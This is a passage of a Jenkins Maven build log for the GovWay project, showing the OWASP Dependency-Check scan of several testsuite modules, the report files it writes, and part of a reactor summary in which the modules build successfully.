completed within the last 240 minutes 17:46:08 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:46:08 [INFO] Check for updates complete (68 ms) 17:46:08 [INFO] 17:46:08 17:46:08 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:46:08 17:46:08 17:46:08 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:46:08 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:46:08 17:46:08 17:46:08 [INFO] Analysis Started 17:46:08 [INFO] Finished File Name Analyzer (0 seconds) 17:46:08 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:46:08 [INFO] Finished Hint Analyzer (0 seconds) 17:46:08 [INFO] Finished Version Filter Analyzer (0 seconds) 17:46:10 [INFO] Created CPE Index (1 seconds) 17:46:10 [INFO] Finished CPE Analyzer (1 seconds) 17:46:10 [INFO] Finished False Positive Analyzer (0 seconds) 17:46:10 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:46:10 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:46:10 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:46:10 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:46:10 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:46:10 [INFO] Analysis Complete (1 seconds) 17:46:10 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:46:10 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:46:10 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:46:10 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:46:10 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:46:10 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:46:10 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:46:10 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:46:10 [INFO] 17:46:10 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.apacheds >------- 17:46:10 [INFO] Building dependencies.testsuite.test.apacheds 1.0 [53/67] 17:46:10 [INFO] from mvn/dependencies/testsuite/test/apacheds/pom.xml 17:46:10 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:10 [INFO] 17:46:10 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.apacheds --- 17:46:10 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/apacheds (includes = [*.jar], excludes = []) 17:46:10 [INFO] 17:46:10 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.apacheds --- 17:46:10 [INFO] 17:46:10 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.testsuite.test.apacheds --- 17:46:10 [INFO] Executing tasks 17:46:10 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/testsuite/apacheds/apacheds-all-2.0.0.AM27.jar 17:46:10 [INFO] Executed tasks 17:46:10 [INFO] 17:46:10 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.apacheds --- 17:46:10 [INFO] Executing tasks 17:46:15 [INFO] Executed tasks 17:46:15 [INFO] 17:46:15 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.apacheds --- 17:46:15 [INFO] Checking for updates 17:46:15 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:46:15 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:46:15 [INFO] Check for updates complete (69 ms) 17:46:15 [INFO] 17:46:15 17:46:15 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:46:15 17:46:15 17:46:15 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:46:15 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:46:15 17:46:15 17:46:15 [INFO] Analysis Started 17:46:15 [INFO] Finished File Name Analyzer (0 seconds) 17:46:15 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:46:15 [INFO] Finished Hint Analyzer (0 seconds) 17:46:15 [INFO] Finished Version Filter Analyzer (0 seconds) 17:46:17 [INFO] Created CPE Index (1 seconds) 17:46:17 [INFO] Finished CPE Analyzer (1 seconds) 17:46:17 [INFO] Finished False Positive Analyzer (0 seconds) 17:46:17 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:46:17 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:46:17 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:46:17 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:46:17 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:46:17 [INFO] Analysis Complete (1 seconds) 17:46:17 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:46:17 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:46:17 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:46:17 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:46:17 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:46:17 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:46:17 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:46:17 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:46:17 [INFO] 17:46:17 [INFO] --------< org.openspcoop2:org.openspcoop2.testsuite.test.cxf3 >--------- 17:46:17 [INFO] Building dependencies.testsuite.test.cxf3 1.0 [54/67] 17:46:17 [INFO] from mvn/dependencies/testsuite/test/cxf3/pom.xml 17:46:17 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:17 [INFO] 17:46:17 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.cxf3 --- 17:46:17 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/cxf3 (includes = [*.jar], excludes = []) 17:46:17 [INFO] 17:46:17 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.cxf3 --- 17:46:17 [INFO] 17:46:17 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.cxf3 --- 17:46:17 [INFO] Executing tasks 17:46:22 [INFO] Executed tasks 17:46:22 [INFO] 17:46:22 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.cxf3 --- 17:46:23 [INFO] Checking for updates 17:46:23 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:46:23 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:46:23 [INFO] Check for updates complete (94 ms) 17:46:23 [INFO] 17:46:23 17:46:23 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:46:23 17:46:23 17:46:23 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:46:23 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:46:23 17:46:23 17:46:23 [INFO] Analysis Started 17:46:23 [INFO] Finished File Name Analyzer (0 seconds) 17:46:23 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:46:23 [INFO] Finished Hint Analyzer (0 seconds) 17:46:23 [INFO] Finished Version Filter Analyzer (0 seconds) 17:46:25 [INFO] Created CPE Index (1 seconds) 17:46:25 [INFO] Finished CPE Analyzer (1 seconds) 17:46:25 [INFO] Finished False Positive Analyzer (0 seconds) 17:46:25 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:46:25 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:46:25 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:46:25 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:46:25 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:46:25 [INFO] Analysis Complete (2 seconds) 17:46:25 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:46:25 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:46:25 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:46:25 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:46:25 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:46:25 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:46:25 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:46:25 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:46:25 [INFO] 17:46:25 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.staticAnalysis >------ 17:46:25 [INFO] Building dependencies.testsuite.staticAnalysis 1.0 [55/67] 17:46:25 [INFO] from mvn/dependencies/testsuite/staticAnalysis/pom.xml 17:46:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:25 [INFO] 17:46:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.staticAnalysis --- 17:46:25 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/staticAnalysis (includes = [*.jar], excludes = []) 17:46:25 [INFO] 17:46:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.staticAnalysis --- 17:46:25 [INFO] 17:46:25 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.staticAnalysis --- 17:46:25 [INFO] Executing tasks 17:46:30 [INFO] Executed tasks 17:46:30 [INFO] 17:46:30 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.staticAnalysis --- 17:46:31 [INFO] Checking for updates 17:46:31 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:46:31 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:46:31 [INFO] Check for updates complete (67 ms) 17:46:31 [INFO] 17:46:31 17:46:31 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:46:31 17:46:31 17:46:31 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:46:31 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:46:31 17:46:31 17:46:31 [INFO] Analysis Started 17:46:31 [INFO] Finished File Name Analyzer (0 seconds) 17:46:31 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:46:31 [INFO] Finished Hint Analyzer (0 seconds) 17:46:31 [INFO] Finished Version Filter Analyzer (0 seconds) 17:46:33 [INFO] Created CPE Index (2 seconds) 17:46:33 [INFO] Finished CPE Analyzer (2 seconds) 17:46:33 [INFO] Finished False Positive Analyzer (0 seconds) 17:46:33 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:46:33 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:46:33 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:46:33 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:46:33 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:46:33 [INFO] Analysis Complete (2 seconds) 17:46:33 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.xml 17:46:33 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.html 17:46:33 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.json 17:46:33 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.csv 17:46:33 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.sarif 17:46:33 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-jenkins.html 17:46:33 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-junit.xml 17:46:33 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-gitlab.json 17:46:33 [INFO] 17:46:33 [INFO] -----< org.openspcoop2:org.openspcoop2.testsuite.dynamicAnalysis >------ 17:46:33 [INFO] Building dependencies.testsuite.dynamicAnalysis 1.0 [56/67] 17:46:33 [INFO] from mvn/dependencies/testsuite/dynamicAnalysis/pom.xml 17:46:33 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:33 [INFO] 17:46:33 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.dynamicAnalysis --- 17:46:33 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/dynamicAnalysis (includes = [*.jar], excludes = []) 17:46:33 [INFO] 17:46:33 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.dynamicAnalysis --- 17:46:33 [INFO] 17:46:33 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.dynamicAnalysis --- 17:46:33 [INFO] Executing tasks 17:46:38 [INFO] Executed tasks 17:46:38 [INFO] 17:46:38 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.dynamicAnalysis --- 17:46:39 [INFO] Checking for updates 17:46:39 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:46:39 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:46:39 [INFO] Check for updates complete (86 ms) 17:46:39 [INFO] 17:46:39 17:46:39 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:46:39 17:46:39 17:46:39 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:46:39 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:46:39 17:46:39 17:46:39 [INFO] Analysis Started 17:46:39 [INFO] Finished File Name Analyzer (0 seconds) 17:46:39 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:46:39 [INFO] Finished Hint Analyzer (0 seconds) 17:46:39 [INFO] Finished Version Filter Analyzer (0 seconds) 17:46:42 [INFO] Created CPE Index (2 seconds) 17:46:42 [INFO] Finished CPE Analyzer (2 seconds) 17:46:42 [INFO] Finished False Positive Analyzer (0 seconds) 17:46:42 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:46:42 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:46:42 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:46:42 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:46:42 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:46:42 [INFO] Analysis Complete (2 seconds) 17:46:42 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.xml 17:46:42 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.html 17:46:42 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.json 17:46:42 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.csv 17:46:42 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.sarif 17:46:42 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-jenkins.html 17:46:42 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-junit.xml 17:46:42 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-gitlab.json 17:46:42 [INFO] 17:46:42 [INFO] ---------< org.openspcoop2:org.openspcoop2.testsuite.coverage >--------- 17:46:42 [INFO] Building dependencies.testsuite.coverage 1.0 [57/67] 17:46:42 [INFO] from mvn/dependencies/testsuite/coverage/pom.xml 17:46:42 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:42 [INFO] 17:46:42 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.coverage --- 17:46:42 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/coverage (includes = [*.jar], excludes = []) 17:46:42 [INFO] 17:46:42 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.coverage --- 17:46:42 [INFO] 17:46:42 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.coverage --- 17:46:42 [INFO] Executing tasks 17:46:47 [INFO] Executed tasks 17:46:47 [INFO] 17:46:47 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.coverage --- 17:46:47 [INFO] Checking for updates 17:46:47 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:46:47 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:46:47 [INFO] Check for updates complete (118 ms) 17:46:48 [INFO] 17:46:48 17:46:48 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:46:48 17:46:48 17:46:48 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:46:48 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:46:48 17:46:48 17:46:48 [INFO] Analysis Started 17:46:48 [INFO] Finished File Name Analyzer (0 seconds) 17:46:48 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:46:48 [INFO] Finished Hint Analyzer (0 seconds) 17:46:48 [INFO] Finished Version Filter Analyzer (0 seconds) 17:46:51 [INFO] Created CPE Index (2 seconds) 17:46:51 [INFO] Finished CPE Analyzer (3 seconds) 17:46:51 [INFO] Finished False Positive Analyzer (0 seconds) 17:46:51 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:46:51 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:46:51 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:46:51 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:46:51 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:46:51 [INFO] Analysis Complete (3 seconds) 17:46:51 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.xml 17:46:51 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.html 17:46:51 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.json 17:46:51 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.csv 17:46:51 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.sarif 17:46:51 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-jenkins.html 17:46:51 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-junit.xml 17:46:51 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-gitlab.json 17:46:51 [INFO] 17:46:51 [INFO] --------------< org.openspcoop2:org.openspcoop2.compile >--------------- 17:46:51 [INFO] Building compile 1.0 [58/67] 17:46:51 [INFO] from mvn/compile/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] --------------< org.openspcoop2:org.openspcoop2.package >--------------- 17:46:51 [INFO] Building package 1.0 [59/67] 17:46:51 [INFO] from distrib/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] ----------< org.openspcoop2:org.openspcoop2.testsuite.utils >----------- 17:46:51 [INFO] Building testsuite.utils 1.0 [60/67] 17:46:51 [INFO] from tools/utils/mvn/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] --------< org.openspcoop2:org.openspcoop2.testsuite.utils.sql >--------- 17:46:51 [INFO] Building testsuite.utils.sql 1.0 [61/67] 17:46:51 [INFO] from tools/utils/mvn/sql/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] ---------< org.openspcoop2:org.openspcoop2.testsuite.pdd.core >--------- 17:46:51 [INFO] Building testsuite.pdd.core 1.0 [62/67] 17:46:51 [INFO] from core/mvn/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.pdd.core.sql >------- 17:46:51 [INFO] Building testsuite.pdd.core.sql 1.0 [63/67] 17:46:51 [INFO] from core/mvn/sql/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] ------< org.openspcoop2:org.openspcoop2.static_analysis.spotbugs >------ 17:46:51 [INFO] Building static_analysis.spotbugs 1.0 [64/67] 17:46:51 [INFO] from tools/spotbugs/mvn/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] -----< org.openspcoop2:org.openspcoop2.static_analysis.sonarqube >------ 17:46:51 [INFO] Building static_analysis.sonarqube 1.0 [65/67] 17:46:51 [INFO] from tools/sonarqube/mvn/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] --------< org.openspcoop2:org.openspcoop2.dynamic_analysis.zap >-------- 17:46:51 [INFO] Building dynamic_analysis.zap 1.0 [66/67] 17:46:51 [INFO] from tools/zap/mvn/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] 17:46:51 [INFO] ----------< org.openspcoop2:org.openspcoop2.coverage.jacoco >----------- 17:46:51 [INFO] Building coverage.jacoco 1.0 [67/67] 17:46:51 [INFO] from tools/jacoco/mvn/pom.xml 17:46:51 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:51 [INFO] ------------------------------------------------------------------------ 17:46:51 [INFO] Reactor Summary for govway 1.0: 17:46:51 [INFO] 17:46:51 [INFO] govway ............................................. SUCCESS [ 0.004 s] 17:46:51 [INFO] dependencies ....................................... SUCCESS [01:27 min] 17:46:51 [INFO] dependencies.ant ................................... SUCCESS [ 13.924 s] 17:46:51 [INFO] dependencies.antinstaller .......................... SUCCESS [ 8.924 s] 17:46:51 [INFO] dependencies.angus ................................. SUCCESS [ 11.177 s] 17:46:51 [INFO] dependencies.bean-validation ....................... SUCCESS [ 8.672 s] 17:46:51 [INFO] dependencies.cxf ................................... SUCCESS [ 12.386 s] 17:46:51 [INFO] dependencies.commons ............................... SUCCESS [ 11.017 s] 17:46:51 [INFO] dependencies.console ............................... SUCCESS [ 20.007 s] 17:46:51 [INFO] dependencies.git ................................... SUCCESS [ 9.636 s] 17:46:51 [INFO] dependencies.httpcore .............................. SUCCESS [ 7.133 s] 17:46:51 [INFO] dependencies.jackson ............................... SUCCESS [ 7.250 s] 17:46:51 [INFO] dependencies.jakarta ............................... SUCCESS [ 7.412 s] 17:46:51 [INFO] dependencies.jaxb .................................. SUCCESS [ 7.229 s] 17:46:51 [INFO] dependencies.jetty ................................. SUCCESS [ 6.959 s] 17:46:51 [INFO] dependencies.jmx ................................... SUCCESS [ 6.955 s] 17:46:51 [INFO] dependencies.json .................................. SUCCESS [ 7.506 s] 17:46:51 [INFO] dependencies.log ................................... SUCCESS [ 7.176 s] 17:46:51 [INFO] dependencies.lucene ................................ SUCCESS [ 7.302 s] 17:46:51 [INFO] dependencies.openapi4j ............................. SUCCESS [ 7.199 s] 17:46:51 [INFO] dependencies.opensaml .............................. SUCCESS [ 7.008 s] 17:46:51 [INFO] dependencies.pdf ................................... SUCCESS [ 7.096 s] 17:46:51 [INFO] dependencies.redis ................................. SUCCESS [ 7.195 s] 17:46:51 [INFO] dependencies.reports ............................... SUCCESS [ 7.302 s] 17:46:51 [INFO] dependencies.saaj .................................. SUCCESS [ 7.142 s] 17:46:51 [INFO] dependencies.security .............................. SUCCESS [ 7.666 s] 17:46:51 [INFO] dependencies.shared ................................ SUCCESS [ 10.942 s] 17:46:51 [INFO] dependencies.spring ................................ SUCCESS [ 9.170 s] 17:46:51 [INFO] dependencies.spring-ldap ........................... SUCCESS [ 9.197 s] 17:46:51 [INFO] dependencies.spring-security ....................... SUCCESS [ 10.639 s] 17:46:51 [INFO] dependencies.swagger ............................... SUCCESS [ 24.667 s] 17:46:51 [INFO] dependencies.wss4j ................................. SUCCESS [ 8.525 s] 17:46:51 [INFO] dependencies.testsuite ............................. SUCCESS [ 7.837 s] 17:46:51 [INFO] dependencies.testsuite.axis14 ...................... SUCCESS [ 7.096 s] 17:46:51 [INFO] dependencies.testsuite.as .......................... SUCCESS [ 7.069 s] 17:46:51 [INFO] dependencies.testsuite.as.wildfly27 ................ SUCCESS [ 6.891 s] 17:46:51 [INFO] dependencies.testsuite.as.wildfly28 ................ SUCCESS [ 7.256 s] 17:46:51 [INFO] dependencies.testsuite.as.wildfly35 ................ SUCCESS [ 7.647 s] 17:46:51 [INFO] dependencies.testsuite.as.wildfly36 ................ SUCCESS [ 7.098 s] 17:46:51 [INFO] dependencies.testsuite.as.wildfly37 ................ SUCCESS [ 7.375 s] 17:46:51 [INFO] dependencies.testsuite.as.wildfly38 ................ SUCCESS [ 7.302 s] 17:46:51 [INFO] dependencies.testsuite.as.wildfly39 ................ SUCCESS [ 8.468 s] 17:46:51 [INFO] dependencies.testsuite.as.tomcat10 ................. SUCCESS [ 8.573 s] 17:46:51 [INFO] 